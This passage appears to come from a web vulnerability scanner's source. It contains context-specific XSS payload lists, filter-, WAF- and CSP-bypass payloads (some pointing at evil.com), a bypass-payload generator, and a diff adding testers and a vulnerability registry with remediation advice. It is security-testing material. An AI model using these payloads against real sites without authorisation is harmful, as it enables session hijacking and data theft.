"<svg/onload=alert(1)>",
"<body/onload=alert(1)>",
"<input/onfocus=alert(1)/autofocus>",
"<scr<script>ipt>alert(1)</scr</script>ipt>",
],
"xss_context_event_handler": [
"alert(1)",
"alert(document.domain)",
"alert`1`",
"confirm(1)",
"prompt(1)",
],
"xss_context_svg": [
"<svg onload=alert(1)>",
"<svg><animate onbegin=alert(1) attributeName=x dur=1s>",
"<svg><set onbegin=alert(1) attributename=x to=1>",
"<svg><animatetransform onbegin=alert(1) attributename=x>",
"<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click</text></a></svg>",
],
"xss_context_textarea": [
"</textarea><script>alert(1)</script>",
"</textarea><img src=x onerror=alert(1)>",
"</textarea><svg onload=alert(1)>",
],
"xss_context_style": [
"</style><script>alert(1)</script>",
"</style><img src=x onerror=alert(1)>",
],
"xss_csp_bypass": [
"<script src='https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.min.js'></script><div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>",
"<base href='//evil.com/'>",
"<script nonce='{{RANDOM_ID}}'>alert(1)</script>",
"<link rel=prefetch href='//evil.com/'>",
],
"xss_dom_sources": [
"#<img src=x onerror=alert(1)>",
"#\"><img src=x onerror=alert(1)>",
"javascript:alert(1)",
"#'-alert(1)-'",
"?default=<script>alert(1)</script>",
"<img src=x onerror=alert(1)>",
],
"xss_canonical_accesskey": [
"<input accesskey=x onclick=alert(1)>",
"<a href=# accesskey=x onclick=alert(1)>press ALT+SHIFT+X</a>",
],
}
def get_context_payloads(self, context: str) -> List[str]:
"""Get payloads for a detected injection context.
Supports enhanced context names from _detect_xss_context_enhanced():
html_body, html_comment, textarea, title, noscript,
attribute_double, attribute_single, attribute_unquoted,
js_string_single, js_string_double, js_template_literal,
href, script_src, event_handler, svg_context, mathml_context, style
"""
# Direct match first
key = f"xss_context_{context}"
if key in self.payload_libraries:
return list(self.payload_libraries[key])
# Fallback mapping for enhanced context names
_fallback = {
"attribute_double": "attribute",
"attribute_single": "attribute",
"attribute_unquoted": "attribute",
"js_string_single": "js_string",
"js_string_double": "js_string",
"js_template_literal": "template_literal",
"html_comment": "html_body",
"title": "textarea", # needs closing tag breakout like textarea
"noscript": "textarea", # needs closing tag breakout
"script_src": "href", # URL-like context
"event_handler": "event_handler",
"svg_context": "svg",
"mathml_context": "html_body",
"style": "style",
}
fallback_ctx = _fallback.get(context)
if fallback_ctx:
fb_key = f"xss_context_{fallback_ctx}"
if fb_key in self.payload_libraries:
return list(self.payload_libraries[fb_key])
# Ultimate fallback: top stored XSS payloads
return list(self.payload_libraries.get("xss_stored", []))[:10]
def get_filter_bypass_payloads(self, filter_map: Dict[str, Any]) -> List[str]:
"""Get bypass payloads based on what's blocked/allowed by filters.
filter_map keys:
- allowed_chars: list of chars that pass through
- blocked_chars: list of chars that are stripped/encoded
- allowed_tags: list of HTML tags that survive
- blocked_tags: list of HTML tags that are stripped
- allowed_events: list of event handlers that survive
- blocked_events: list of event handlers stripped
- csp: CSP header value (or None)
- waf_detected: bool
"""
payloads: List[str] = []
allowed_chars = set(filter_map.get("allowed_chars", []))
blocked_chars = set(filter_map.get("blocked_chars", []))
allowed_tags = filter_map.get("allowed_tags", [])
allowed_events = filter_map.get("allowed_events", [])
waf = filter_map.get("waf_detected", False)
# If custom tags allowed, use them
if allowed_tags:
for tag in allowed_tags:
for evt in (allowed_events or ["onfocus", "onload", "onerror"]):
if tag in ("svg", "body", "math") and evt in ("onload",):
payloads.append(f"<{tag} {evt}=alert(1)>")
elif tag in ("img", "video", "audio", "source", "object", "input") and evt in ("onerror",):
payloads.append(f"<{tag} src=x {evt}=alert(1)>")
elif evt == "onfocus":
payloads.append(f"<{tag} {evt}=alert(1) autofocus tabindex=1></{tag}>")
elif evt == "onbegin":
payloads.append(f"<svg><{tag} {evt}=alert(1)>")
elif evt in ("onanimationend",):
payloads.append(f"<style>@keyframes x{{}}</style><{tag} style='animation-name:x' {evt}=alert(1)>")
else:
payloads.append(f"<{tag} {evt}=alert(1)></{tag}>")
# Event handler bypass payloads
payloads.extend(self.payload_libraries.get("xss_bypass_event_handlers", []))
# Custom tag bypass payloads
payloads.extend(self.payload_libraries.get("xss_bypass_custom_tags", []))
# If parentheses are blocked, use backtick/encoding variants
if "(" in blocked_chars or ")" in blocked_chars:
payloads.extend(self.payload_libraries.get("xss_bypass_alert_blocked", []))
# If angle brackets are partially blocked, try encoding
if "<" in blocked_chars or ">" in blocked_chars:
payloads.extend(self.payload_libraries.get("xss_bypass_encoding", []))
# WAF-specific bypasses
if waf:
payloads.extend(self.payload_libraries.get("xss_bypass_waf", []))
# CSP bypass payloads
if filter_map.get("csp"):
payloads.extend(self.payload_libraries.get("xss_csp_bypass", []))
# Deduplicate while preserving order
seen = set()
unique: List[str] = []
for p in payloads:
if p not in seen:
seen.add(p)
unique.append(p)
return unique
async def get_payloads(
self,
vuln_type: str,
+222 -10
View File
@@ -11,23 +11,52 @@ from backend.core.vuln_engine.testers.injection import (
SQLiErrorTester, SQLiUnionTester, SQLiBlindTester, SQLiTimeTester,
CommandInjectionTester, SSTITester, NoSQLInjectionTester
)
from backend.core.vuln_engine.testers.advanced_injection import (
LdapInjectionTester, XpathInjectionTester, GraphqlInjectionTester,
CrlfInjectionTester, HeaderInjectionTester, EmailInjectionTester,
ELInjectionTester, LogInjectionTester, HtmlInjectionTester,
CsvInjectionTester, OrmInjectionTester
)
from backend.core.vuln_engine.testers.file_access import (
LFITester, RFITester, PathTraversalTester, XXETester, FileUploadTester
LFITester, RFITester, PathTraversalTester, XXETester, FileUploadTester,
ArbitraryFileReadTester, ArbitraryFileDeleteTester, ZipSlipTester
)
from backend.core.vuln_engine.testers.request_forgery import (
SSRFTester, CSRFTester
SSRFTester, CSRFTester, GraphqlIntrospectionTester, GraphqlDosTester
)
from backend.core.vuln_engine.testers.auth import (
AuthBypassTester, JWTManipulationTester, SessionFixationTester
AuthBypassTester, JWTManipulationTester, SessionFixationTester,
WeakPasswordTester, DefaultCredentialsTester, TwoFactorBypassTester,
OauthMisconfigTester
)
from backend.core.vuln_engine.testers.authorization import (
IDORTester, BOLATester, PrivilegeEscalationTester
IDORTester, BOLATester, PrivilegeEscalationTester,
BflaTester, MassAssignmentTester, ForcedBrowsingTester
)
from backend.core.vuln_engine.testers.client_side import (
CORSTester, ClickjackingTester, OpenRedirectTester
CORSTester, ClickjackingTester, OpenRedirectTester,
DomClobberingTester, PostMessageVulnTester, WebsocketHijackTester,
PrototypePollutionTester, CssInjectionTester, TabnabbingTester
)
from backend.core.vuln_engine.testers.infrastructure import (
SecurityHeadersTester, SSLTester, HTTPMethodsTester
SecurityHeadersTester, SSLTester, HTTPMethodsTester,
DirectoryListingTester, DebugModeTester, ExposedAdminPanelTester,
ExposedApiDocsTester, InsecureCookieFlagsTester
)
from backend.core.vuln_engine.testers.logic import (
RaceConditionTester, BusinessLogicTester, RateLimitBypassTester,
ParameterPollutionTester, TypeJugglingTester, TimingAttackTester,
HostHeaderInjectionTester, HttpSmugglingTester, CachePoisoningTester
)
from backend.core.vuln_engine.testers.data_exposure import (
SensitiveDataExposureTester, InformationDisclosureTester,
ApiKeyExposureTester, SourceCodeDisclosureTester,
BackupFileExposureTester, VersionDisclosureTester
)
from backend.core.vuln_engine.testers.cloud_supply import (
S3BucketMisconfigTester, CloudMetadataExposureTester,
SubdomainTakeoverTester, VulnerableDependencyTester,
ContainerEscapeTester, ServerlessMisconfigTester
)
@@ -323,11 +352,102 @@ class VulnerabilityRegistry:
"description": "Flaw in application's business logic allowing unintended behavior.",
"impact": "Varies based on specific flaw - could range from minor to critical impact.",
"remediation": "1. Review business logic flows\n2. Implement comprehensive validation\n3. Add server-side checks for all rules\n4. Test edge cases and negative scenarios"
}
},
# ===== NEW TYPES (68 additional) =====
# Advanced Injection
"ldap_injection": {"title": "LDAP Injection", "severity": "high", "cwe_id": "CWE-90", "description": "User input injected into LDAP queries allowing directory enumeration or auth bypass.", "impact": "Directory enumeration, authentication bypass, data extraction from LDAP stores.", "remediation": "1. Escape LDAP special characters\n2. Use parameterized LDAP queries\n3. Validate input against whitelist\n4. Apply least privilege to LDAP accounts"},
"xpath_injection": {"title": "XPath Injection", "severity": "high", "cwe_id": "CWE-643", "description": "User input injected into XPath queries manipulating XML data retrieval.", "impact": "Extraction of XML data, authentication bypass via XPath condition manipulation.", "remediation": "1. Use parameterized XPath queries\n2. Validate and sanitize input\n3. Avoid string concatenation in XPath\n4. Limit XPath query privileges"},
"graphql_injection": {"title": "GraphQL Injection", "severity": "high", "cwe_id": "CWE-89", "description": "Injection attacks targeting GraphQL endpoints through malicious queries or variables.", "impact": "Schema exposure, unauthorized data access, denial of service via complex queries.", "remediation": "1. Disable introspection in production\n2. Implement query depth/complexity limits\n3. Use persisted queries\n4. Apply field-level authorization"},
"crlf_injection": {"title": "CRLF Injection / HTTP Response Splitting", "severity": "medium", "cwe_id": "CWE-93", "description": "Injection of CRLF characters to manipulate HTTP response headers or split responses.", "impact": "HTTP header injection, session fixation via Set-Cookie, XSS via response splitting.", "remediation": "1. Strip \\r\\n from user input in headers\n2. Use framework header-setting functions\n3. Validate header values\n4. Implement WAF rules for CRLF patterns"},
"header_injection": {"title": "HTTP Header Injection", "severity": "medium", "cwe_id": "CWE-113", "description": "User input reflected in HTTP headers enabling header manipulation.", "impact": "Password reset poisoning, cache poisoning, access control bypass via header manipulation.", "remediation": "1. Validate Host header against whitelist\n2. Don't use Host header for URL generation\n3. Strip CRLF from header values\n4. Use absolute URLs for sensitive operations"},
"email_injection": {"title": "Email Header Injection", "severity": "medium", "cwe_id": "CWE-93", "description": "Injection of email headers through form fields that feed into mail functions.", "impact": "Spam relay, phishing via injected CC/BCC recipients, email content manipulation.", "remediation": "1. Validate email addresses strictly\n2. Strip CRLF from email inputs\n3. Use email library APIs not raw headers\n4. Implement rate limiting on email features"},
"expression_language_injection": {"title": "Expression Language Injection", "severity": "critical", "cwe_id": "CWE-917", "description": "Injection of EL/SpEL/OGNL expressions evaluated server-side in Java applications.", "impact": "Remote code execution, server compromise, data exfiltration via expression evaluation.", "remediation": "1. Disable EL evaluation on user input\n2. Use strict sandboxing\n3. Update frameworks (Struts2 OGNL patches)\n4. Validate input before template rendering"},
"log_injection": {"title": "Log Injection / Log4Shell", "severity": "high", "cwe_id": "CWE-117", "description": "Injection into application logs enabling log forging or JNDI-based RCE (Log4Shell).", "impact": "Log tampering, JNDI-based RCE (Log4Shell), log analysis tool exploitation.", "remediation": "1. Strip newlines from log input\n2. Update Log4j to 2.17+ (CVE-2021-44228)\n3. Disable JNDI lookups\n4. Use structured logging"},
"html_injection": {"title": "HTML Injection", "severity": "medium", "cwe_id": "CWE-79", "description": "Injection of HTML markup into web pages without script execution.", "impact": "Content spoofing, phishing form injection, defacement, link manipulation.", "remediation": "1. HTML-encode all user output\n2. Use Content-Security-Policy\n3. Implement output encoding libraries\n4. Sanitize HTML with whitelist approach"},
"csv_injection": {"title": "CSV/Formula Injection", "severity": "medium", "cwe_id": "CWE-1236", "description": "Injection of spreadsheet formulas into data exported as CSV/Excel.", "impact": "Code execution when CSV opened in Excel, DDE attacks, data exfiltration via formulas.", "remediation": "1. Prefix cells starting with =,+,-,@ with single quote\n2. Sanitize formula characters\n3. Use safe CSV export libraries\n4. Warn users about untrusted CSV files"},
"orm_injection": {"title": "ORM Injection", "severity": "high", "cwe_id": "CWE-89", "description": "Injection through ORM query builders via operator injection or raw query manipulation.", "impact": "Data extraction, authentication bypass through ORM filter manipulation.", "remediation": "1. Use ORM built-in parameter binding\n2. Avoid raw queries with user input\n3. Validate filter operators\n4. Use field-level whitelists"},
# XSS Advanced
"blind_xss": {"title": "Blind Cross-Site Scripting", "severity": "high", "cwe_id": "CWE-79", "description": "XSS payload stored and executed in backend/admin context not visible to the attacker.", "impact": "Admin session hijacking, backend system compromise, persistent access to admin panels.", "remediation": "1. Sanitize all input regardless of display context\n2. Implement CSP on admin panels\n3. Use HttpOnly cookies\n4. Review admin panel input rendering"},
"mutation_xss": {"title": "Mutation XSS (mXSS)", "severity": "high", "cwe_id": "CWE-79", "description": "XSS via browser HTML mutation where sanitized HTML changes to executable form after DOM processing.", "impact": "Bypasses HTML sanitizers, executes JavaScript through browser parsing quirks.", "remediation": "1. Update DOMPurify/sanitizers\n2. Use textContent not innerHTML\n3. Avoid innerHTML re-serialization\n4. Test with multiple browsers"},
# File Access Advanced
"arbitrary_file_read": {"title": "Arbitrary File Read", "severity": "high", "cwe_id": "CWE-22", "description": "Reading arbitrary files via API or download endpoints outside intended scope.", "impact": "Access to credentials, configuration, source code, private keys.", "remediation": "1. Validate file paths against whitelist\n2. Use chroot/jail\n3. Implement proper access controls\n4. Avoid user input in file paths"},
"arbitrary_file_delete": {"title": "Arbitrary File Delete", "severity": "high", "cwe_id": "CWE-22", "description": "Deleting arbitrary files through path traversal in delete operations.", "impact": "Denial of service, security bypass by deleting .htaccess/config, data destruction.", "remediation": "1. Validate file paths strictly\n2. Use indirect references\n3. Implement soft-delete\n4. Restrict delete operations to specific directories"},
"zip_slip": {"title": "Zip Slip (Archive Path Traversal)", "severity": "high", "cwe_id": "CWE-22", "description": "Path traversal via crafted archive filenames writing files outside extraction directory.", "impact": "Arbitrary file write, web shell deployment, configuration overwrite.", "remediation": "1. Validate archive entry names\n2. Resolve and check extraction paths\n3. Use secure archive extraction libraries\n4. Extract to isolated directories"},
# Auth Advanced
"weak_password": {"title": "Weak Password Policy", "severity": "medium", "cwe_id": "CWE-521", "description": "Application accepts weak passwords that can be easily guessed or brute-forced.", "impact": "Account compromise through password guessing, credential stuffing success.", "remediation": "1. Enforce minimum 8+ character passwords\n2. Check against breached password databases\n3. Implement password strength meter\n4. Follow NIST SP 800-63B guidelines"},
"default_credentials": {"title": "Default Credentials", "severity": "critical", "cwe_id": "CWE-798", "description": "Application or service uses default factory credentials that haven't been changed.", "impact": "Complete unauthorized access to admin or management interfaces.", "remediation": "1. Force password change on first login\n2. Remove default accounts\n3. Implement strong default password generation\n4. Regular credential audits"},
"brute_force": {"title": "Brute Force Vulnerability", "severity": "medium", "cwe_id": "CWE-307", "description": "Login endpoint lacks rate limiting or account lockout allowing unlimited password attempts.", "impact": "Account compromise through automated password guessing.", "remediation": "1. Implement account lockout after N failures\n2. Add rate limiting per IP and per account\n3. Implement CAPTCHA after failures\n4. Use progressive delays"},
"two_factor_bypass": {"title": "Two-Factor Authentication Bypass", "severity": "high", "cwe_id": "CWE-287", "description": "Second authentication factor can be bypassed through implementation flaws.", "impact": "Account takeover even when 2FA is enabled, defeating the purpose of MFA.", "remediation": "1. Enforce 2FA check on all authenticated routes\n2. Use server-side session state for 2FA completion\n3. Rate limit code attempts\n4. Make codes single-use with short expiry"},
"oauth_misconfiguration": {"title": "OAuth Misconfiguration", "severity": "high", "cwe_id": "CWE-601", "description": "OAuth implementation flaws allowing redirect URI manipulation, state bypass, or token theft.", "impact": "Account takeover via stolen OAuth tokens, cross-site request forgery.", "remediation": "1. Strictly validate redirect_uri\n2. Require and validate state parameter\n3. Use PKCE for public clients\n4. Validate all OAuth scopes"},
# Authorization Advanced
"bfla": {"title": "Broken Function Level Authorization", "severity": "high", "cwe_id": "CWE-285", "description": "Admin API functions accessible to regular users without proper role checks.", "impact": "Privilege escalation to admin functionality, system configuration changes.", "remediation": "1. Implement role-based access control on all endpoints\n2. Deny by default\n3. Centralize authorization logic\n4. Audit all admin endpoints"},
"mass_assignment": {"title": "Mass Assignment", "severity": "high", "cwe_id": "CWE-915", "description": "Application binds user-supplied data to internal model fields without filtering.", "impact": "Privilege escalation, data manipulation, bypassing business rules.", "remediation": "1. Use explicit field whitelists\n2. Implement DTOs for input\n3. Validate all bound fields\n4. Use strong parameter filtering"},
"forced_browsing": {"title": "Forced Browsing / Broken Access Control", "severity": "medium", "cwe_id": "CWE-425", "description": "Direct URL access to restricted resources that should require authorization.", "impact": "Access to admin panels, sensitive files, debug interfaces, and internal tools.", "remediation": "1. Implement authentication on all protected routes\n2. Return 404 instead of 403 for sensitive paths\n3. Remove unnecessary files\n4. Use web server access controls"},
# Client-Side Advanced
"dom_clobbering": {"title": "DOM Clobbering", "severity": "medium", "cwe_id": "CWE-79", "description": "HTML injection that overrides JavaScript DOM properties through named elements.", "impact": "JavaScript logic bypass, potential XSS through clobbered variables.", "remediation": "1. Use strict variable declarations (const/let)\n2. Avoid global variable references\n3. Use safe DOM APIs\n4. Sanitize HTML input"},
"postmessage_vulnerability": {"title": "postMessage Vulnerability", "severity": "medium", "cwe_id": "CWE-346", "description": "postMessage handlers that don't validate message origin allowing cross-origin data injection.", "impact": "Cross-origin data injection, XSS via injected data, sensitive data exfiltration.", "remediation": "1. Always validate event.origin\n2. Validate message data structure\n3. Use specific target origins\n4. Minimize data sent via postMessage"},
"websocket_hijacking": {"title": "Cross-Site WebSocket Hijacking", "severity": "high", "cwe_id": "CWE-1385", "description": "WebSocket endpoints accepting connections from arbitrary origins without validation.", "impact": "Real-time data theft, message injection, session hijacking via WebSocket.", "remediation": "1. Validate Origin header on WebSocket upgrade\n2. Require authentication per-message\n3. Implement CSRF protection for handshake\n4. Use WSS (encrypted)"},
"prototype_pollution": {"title": "Prototype Pollution", "severity": "high", "cwe_id": "CWE-1321", "description": "Injection of properties into JavaScript Object.prototype through merge/extend operations.", "impact": "Authentication bypass, RCE via gadget chains, denial of service.", "remediation": "1. Freeze Object.prototype\n2. Sanitize __proto__ and constructor keys\n3. Use Map instead of plain objects\n4. Update vulnerable libraries"},
"css_injection": {"title": "CSS Injection", "severity": "medium", "cwe_id": "CWE-79", "description": "Injection of CSS code through user input reflected in style contexts.", "impact": "Data exfiltration via CSS selectors, UI manipulation, phishing.", "remediation": "1. Sanitize CSS properties\n2. Use CSP style-src\n3. Avoid user input in style attributes\n4. Whitelist safe CSS properties"},
"tabnabbing": {"title": "Reverse Tabnabbing", "severity": "low", "cwe_id": "CWE-1022", "description": "Links with target=_blank without rel=noopener allowing opener tab navigation.", "impact": "Phishing via original tab replacement with fake login page.", "remediation": "1. Add rel='noopener noreferrer' to target=_blank links\n2. Use frameworks that add it automatically\n3. Audit user-generated links"},
# Infrastructure Advanced
"directory_listing": {"title": "Directory Listing Enabled", "severity": "low", "cwe_id": "CWE-548", "description": "Web server auto-indexing enabled exposing directory file structure.", "impact": "Exposure of file structure, sensitive files, backup files, and configuration.", "remediation": "1. Disable directory listing (Options -Indexes)\n2. Add index files to all directories\n3. Review web server configuration\n4. Use custom error pages"},
"debug_mode": {"title": "Debug Mode Enabled", "severity": "high", "cwe_id": "CWE-489", "description": "Application running in debug/development mode in production.", "impact": "Source code exposure, interactive console access, credential disclosure.", "remediation": "1. Disable debug mode in production\n2. Use environment-specific configuration\n3. Implement custom error pages\n4. Remove debug endpoints"},
"exposed_admin_panel": {"title": "Exposed Administration Panel", "severity": "medium", "cwe_id": "CWE-200", "description": "Admin panel accessible from public internet without IP restrictions.", "impact": "Brute force target, credential theft, administration access if default creds.", "remediation": "1. Restrict admin access by IP/VPN\n2. Use strong authentication + 2FA\n3. Change default admin paths\n4. Implement rate limiting"},
"exposed_api_docs": {"title": "Exposed API Documentation", "severity": "low", "cwe_id": "CWE-200", "description": "API documentation (Swagger/OpenAPI/GraphQL playground) publicly accessible.", "impact": "Complete API endpoint mapping, parameter discovery, potential unauthorized access.", "remediation": "1. Disable API docs in production\n2. Require authentication for docs\n3. Disable GraphQL introspection\n4. Use API gateway access controls"},
"insecure_cookie_flags": {"title": "Insecure Cookie Configuration", "severity": "medium", "cwe_id": "CWE-614", "description": "Session cookies missing security flags (Secure, HttpOnly, SameSite).", "impact": "Cookie theft via XSS (no HttpOnly), MITM (no Secure), CSRF (no SameSite).", "remediation": "1. Set HttpOnly on session cookies\n2. Set Secure flag on HTTPS sites\n3. Set SameSite=Lax or Strict\n4. Review all cookie configurations"},
"http_smuggling": {"title": "HTTP Request Smuggling", "severity": "high", "cwe_id": "CWE-444", "description": "Discrepancy between front-end and back-end HTTP parsing enabling request smuggling.", "impact": "Cache poisoning, request hijacking, authentication bypass, response queue poisoning.", "remediation": "1. Use HTTP/2 end-to-end\n2. Normalize Content-Length/Transfer-Encoding\n3. Reject ambiguous requests\n4. Update proxy/server software"},
"cache_poisoning": {"title": "Web Cache Poisoning", "severity": "high", "cwe_id": "CWE-444", "description": "Manipulation of cached responses via unkeyed inputs to serve malicious content.", "impact": "Mass XSS via cached responses, redirect poisoning, denial of service.", "remediation": "1. Include all inputs in cache key\n2. Validate unkeyed headers\n3. Use Vary header correctly\n4. Implement cache key normalization"},
# Logic & Data
"rate_limit_bypass": {"title": "Rate Limit Bypass", "severity": "medium", "cwe_id": "CWE-770", "description": "Rate limiting can be bypassed through header manipulation or request variation.", "impact": "Enables brute force attacks, API abuse, and denial of service.", "remediation": "1. Rate limit by authenticated user, not just IP\n2. Don't trust X-Forwarded-For for rate limiting\n3. Implement at multiple layers\n4. Use sliding window algorithms"},
"parameter_pollution": {"title": "HTTP Parameter Pollution", "severity": "medium", "cwe_id": "CWE-235", "description": "Duplicate parameters exploit parsing differences between front-end and back-end.", "impact": "WAF bypass, logic bypass, access control circumvention.", "remediation": "1. Normalize parameters server-side\n2. Reject duplicate parameters\n3. Use consistent parsing\n4. Test with duplicate params"},
"type_juggling": {"title": "Type Juggling / Type Coercion", "severity": "high", "cwe_id": "CWE-843", "description": "Loose type comparison exploited to bypass authentication or security checks.", "impact": "Authentication bypass, security check circumvention via type confusion.", "remediation": "1. Use strict comparison (=== in PHP/JS)\n2. Validate input types\n3. Use strong typing\n4. Hash comparison with timing-safe functions"},
"insecure_deserialization": {"title": "Insecure Deserialization", "severity": "critical", "cwe_id": "CWE-502", "description": "Untrusted data deserialized without validation enabling code execution.", "impact": "Remote code execution, denial of service, authentication bypass.", "remediation": "1. Don't deserialize untrusted data\n2. Use JSON instead of native serialization\n3. Implement integrity checks\n4. Restrict deserialization types"},
"subdomain_takeover": {"title": "Subdomain Takeover", "severity": "high", "cwe_id": "CWE-284", "description": "Dangling DNS records pointing to unclaimed cloud resources.", "impact": "Domain impersonation, phishing, cookie theft, authentication bypass.", "remediation": "1. Audit DNS records regularly\n2. Remove dangling CNAME records\n3. Monitor cloud resource lifecycle\n4. Use DNS monitoring tools"},
"host_header_injection": {"title": "Host Header Injection", "severity": "medium", "cwe_id": "CWE-644", "description": "Host header value used in URL generation enabling poisoning attacks.", "impact": "Password reset poisoning, cache poisoning, SSRF via Host header.", "remediation": "1. Validate Host against allowed values\n2. Use absolute URLs from configuration\n3. Don't use Host header for URL generation\n4. Implement ALLOWED_HOSTS"},
"timing_attack": {"title": "Timing Attack", "severity": "medium", "cwe_id": "CWE-208", "description": "Response time variations leak information about valid usernames or secret values.", "impact": "Username enumeration, token/password character extraction.", "remediation": "1. Use constant-time comparison for secrets\n2. Normalize response times\n3. Add random delays\n4. Use same code path for valid/invalid input"},
"improper_error_handling": {"title": "Improper Error Handling", "severity": "low", "cwe_id": "CWE-209", "description": "Verbose error messages disclosing internal information in production.", "impact": "Source path disclosure, database details, technology stack exposure aiding further attacks.", "remediation": "1. Use custom error pages in production\n2. Log errors server-side only\n3. Return generic error messages\n4. Disable debug/stack trace output"},
"sensitive_data_exposure": {"title": "Sensitive Data Exposure", "severity": "high", "cwe_id": "CWE-200", "description": "Sensitive data (PII, credentials, tokens) exposed in responses, URLs, or storage.", "impact": "Identity theft, account compromise, regulatory violations (GDPR, HIPAA).", "remediation": "1. Minimize data in API responses\n2. Encrypt sensitive data at rest/transit\n3. Remove sensitive data from URLs\n4. Implement data classification"},
"information_disclosure": {"title": "Information Disclosure", "severity": "low", "cwe_id": "CWE-200", "description": "Unintended exposure of internal details: versions, paths, technology stack.", "impact": "Aids further attacks with technology-specific exploits and internal knowledge.", "remediation": "1. Remove version headers\n2. Disable directory listing\n3. Remove HTML comments\n4. Secure .git and config files"},
"api_key_exposure": {"title": "API Key Exposure", "severity": "high", "cwe_id": "CWE-798", "description": "API keys or secrets hardcoded in client-side code or public files.", "impact": "Unauthorized API access, financial impact, data breach via exposed keys.", "remediation": "1. Use environment variables for secrets\n2. Implement key rotation\n3. Use backend proxy for API calls\n4. Monitor key usage for anomalies"},
"source_code_disclosure": {"title": "Source Code Disclosure", "severity": "high", "cwe_id": "CWE-540", "description": "Application source code accessible through misconfigured servers, backups, or VCS exposure.", "impact": "White-box attack surface, credential discovery, vulnerability identification.", "remediation": "1. Block .git, .svn access\n2. Remove source maps in production\n3. Delete backup files\n4. Configure web server to block sensitive extensions"},
"backup_file_exposure": {"title": "Backup File Exposure", "severity": "high", "cwe_id": "CWE-530", "description": "Backup files, database dumps, or archives accessible from web server.", "impact": "Full source code access, database contents including credentials.", "remediation": "1. Store backups outside web root\n2. Remove old backup files\n3. Block backup extensions in web server\n4. Encrypt backup files"},
"version_disclosure": {"title": "Software Version Disclosure", "severity": "low", "cwe_id": "CWE-200", "description": "Specific software versions exposed enabling targeted CVE exploitation.", "impact": "Targeted exploitation of known vulnerabilities for the specific version.", "remediation": "1. Remove version from headers\n2. Update software regularly\n3. Remove version-disclosing files\n4. Customize error pages"},
# Crypto & Supply
"weak_encryption": {"title": "Weak Encryption Algorithm", "severity": "medium", "cwe_id": "CWE-327", "description": "Use of weak/deprecated encryption algorithms (DES, RC4, ECB mode).", "impact": "Data decryption, MITM attacks, breaking confidentiality protections.", "remediation": "1. Use AES-256-GCM or ChaCha20\n2. Disable weak cipher suites\n3. Use TLS 1.2+ only\n4. Regular cryptographic review"},
"weak_hashing": {"title": "Weak Hashing Algorithm", "severity": "medium", "cwe_id": "CWE-328", "description": "Use of weak hash algorithms (MD5, SHA1) for security-critical purposes.", "impact": "Password cracking, hash collision attacks, integrity bypass.", "remediation": "1. Use bcrypt/scrypt/argon2 for passwords\n2. Use SHA-256+ for integrity\n3. Always use salts\n4. Implement key stretching"},
"weak_random": {"title": "Weak Random Number Generation", "severity": "medium", "cwe_id": "CWE-330", "description": "Predictable random numbers used for security tokens or session IDs.", "impact": "Token prediction, session hijacking, CSRF token bypass.", "remediation": "1. Use cryptographic PRNG (secrets module, SecureRandom)\n2. Avoid Math.random() for security\n3. Use sufficient entropy\n4. Regular token rotation"},
"cleartext_transmission": {"title": "Cleartext Transmission of Sensitive Data", "severity": "medium", "cwe_id": "CWE-319", "description": "Sensitive data transmitted over unencrypted HTTP connections.", "impact": "Credential theft via MITM, session hijacking, data exposure.", "remediation": "1. Enforce HTTPS everywhere\n2. Implement HSTS with preload\n3. Redirect HTTP to HTTPS\n4. Set Secure flag on cookies"},
"vulnerable_dependency": {"title": "Vulnerable Third-Party Dependency", "severity": "varies", "cwe_id": "CWE-1104", "description": "Third-party library with known CVEs in use.", "impact": "Depends on specific CVE - from XSS to RCE.", "remediation": "1. Regular dependency updates\n2. Use automated vulnerability scanning\n3. Monitor CVE advisories\n4. Implement SCA in CI/CD"},
"outdated_component": {"title": "Outdated Software Component", "severity": "medium", "cwe_id": "CWE-1104", "description": "Significantly outdated CMS, framework, or server with multiple known CVEs.", "impact": "Multiple exploitable vulnerabilities, targeted attacks.", "remediation": "1. Update to latest stable version\n2. Enable automatic security updates\n3. Monitor end-of-life announcements\n4. Implement patch management"},
"insecure_cdn": {"title": "Insecure CDN Resource Loading", "severity": "low", "cwe_id": "CWE-829", "description": "External scripts loaded without Subresource Integrity (SRI) hashes.", "impact": "Supply chain attack via CDN compromise, mass XSS.", "remediation": "1. Add integrity= attribute to script/link tags\n2. Use crossorigin attribute\n3. Self-host critical resources\n4. Implement CSP with hash sources"},
"container_escape": {"title": "Container Escape / Misconfiguration", "severity": "critical", "cwe_id": "CWE-250", "description": "Container running with elevated privileges or exposed host resources.", "impact": "Host system compromise, lateral movement, data access across containers.", "remediation": "1. Don't use --privileged\n2. Drop unnecessary capabilities\n3. Don't mount Docker socket\n4. Use seccomp/AppArmor profiles"},
# Cloud & API
"s3_bucket_misconfiguration": {"title": "S3/Cloud Storage Misconfiguration", "severity": "high", "cwe_id": "CWE-284", "description": "Cloud storage bucket with public read/write access.", "impact": "Data exposure, data tampering, hosting malicious content.", "remediation": "1. Enable S3 Block Public Access\n2. Review bucket policies\n3. Use IAM policies for access\n4. Enable access logging"},
"cloud_metadata_exposure": {"title": "Cloud Metadata Exposure", "severity": "critical", "cwe_id": "CWE-918", "description": "Cloud instance metadata service accessible exposing credentials.", "impact": "IAM credential theft, cloud account compromise, lateral movement.", "remediation": "1. Use IMDSv2 (token-required)\n2. Block metadata endpoint in firewall\n3. Implement SSRF protection\n4. Use minimal IAM roles"},
"serverless_misconfiguration": {"title": "Serverless Misconfiguration", "severity": "medium", "cwe_id": "CWE-284", "description": "Serverless function with excessive permissions or missing auth.", "impact": "Unauthorized function execution, environment variable exposure, privilege escalation.", "remediation": "1. Apply least privilege IAM roles\n2. Require authentication\n3. Don't expose secrets in env vars\n4. Implement function authorization"},
"graphql_introspection": {"title": "GraphQL Introspection Enabled", "severity": "low", "cwe_id": "CWE-200", "description": "GraphQL introspection enabled in production exposing full API schema.", "impact": "Complete API mapping, discovery of sensitive types and mutations.", "remediation": "1. Disable introspection in production\n2. Use persisted queries\n3. Implement field-level authorization\n4. Use query allowlisting"},
"graphql_dos": {"title": "GraphQL Denial of Service", "severity": "medium", "cwe_id": "CWE-400", "description": "GraphQL endpoint vulnerable to resource-exhaustion via complex/nested queries.", "impact": "Service unavailability, resource exhaustion, increased infrastructure costs.", "remediation": "1. Implement query depth limits\n2. Add query complexity analysis\n3. Set timeout on queries\n4. Use persisted/allowlisted queries"},
